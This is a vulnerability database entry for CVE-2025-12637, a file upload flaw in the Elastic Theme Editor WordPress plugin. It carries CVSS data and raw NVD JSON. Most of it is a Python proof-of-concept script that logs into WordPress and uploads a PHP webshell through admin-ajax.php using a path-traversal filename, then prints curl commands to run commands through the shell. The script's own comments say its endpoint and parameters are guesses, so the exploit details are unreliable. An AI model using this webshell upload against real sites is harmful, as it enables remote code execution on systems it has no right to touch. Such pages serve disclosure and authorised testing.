CVE-2025-12637

Description

The Elastic Theme Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a dynamic code generation feature in the process_theme function in all versions up to, and including, 0.0.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Elastic Theme Editor plugin for WordPress <= 0.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12637 PoC - Elastic Theme Editor Arbitrary File Upload
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

# Target configuration
TARGET_URL = "http://target-wordpress-site.com"  # Replace with actual target URL
USERNAME = "attacker"  # Attacker WordPress username
PASSWORD = "password"  # Attacker WordPress password

# Malicious payload - PHP webshell
PAYLOAD = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"
FILENAME = "shell.php"

def exploit():
    """
    Exploit arbitrary file upload vulnerability in Elastic Theme Editor
    """
    print(f"[*] Starting exploit for CVE-2025-12637")
    print(f"[*] Target: {TARGET_URL}")
    
    # Step 1: Authenticate to WordPress
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    
    print("[*] Authenticating as subscriber user...")
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies) and response.status_code == 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Upload malicious file via plugin endpoint
    upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Note: Actual endpoint and parameters may vary
    # This is a conceptual PoC - actual exploitation requires identifying
    # the specific vulnerable endpoint in the plugin
    upload_data = {
        'action': 'elastic_editor_process_theme',
        'filename': FILENAME,
        'content': PAYLOAD,
        'theme_path': f"../../uploads/{FILENAME}"  # Path traversal attempt
    }
    
    print(f"[*] Attempting to upload malicious file: {FILENAME}")
    response = session.post(upload_url, data=upload_data)
    
    if response.status_code == 200:
        print(f"[+] File upload request sent")
        
        # Step 3: Verify file upload and attempt RCE
        shell_url = f"{TARGET_URL}/wp-content/uploads/{FILENAME}"
        print(f"[*] Checking if shell was uploaded...")
        
        verify_response = session.get(shell_url, timeout=5)
        if verify_response.status_code == 200 and 'system' in verify_response.text:
            print(f"[+] Shell uploaded successfully!")
            print(f"[+] Access shell at: {shell_url}?cmd=whoami")
            print(f"[+] Example: curl '{shell_url}?cmd=id'")
            return True
        else:
            print("[-] Shell upload may have failed or path is different")
            print(f"[*] Response status: {verify_response.status_code}")
    else:
        print(f"[-] Upload failed with status: {response.status_code}")
    
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12637 - Elastic Theme Editor File Upload RCE")
    print("=" * 60)
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12637
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12637
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12637/
[4] VulDB https://vuldb.com/cve/CVE-2025-12637
[5] https://plugins.trac.wordpress.org/browser/elastic-theme-editor/trunk/editor/class-elastic-editor.php
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/e158a13d-5452-492a-875e-53791e1ff840?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12637", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:47.893", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Elastic Theme Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a dynamic code generation feature in the process_theme function in all versions up to, and including, 0.0.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/elastic-theme-editor/trunk/editor/class-elastic-editor.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e158a13d-5452-492a-875e-53791e1ff840?source=cve", "source": "[email protected]"}]}}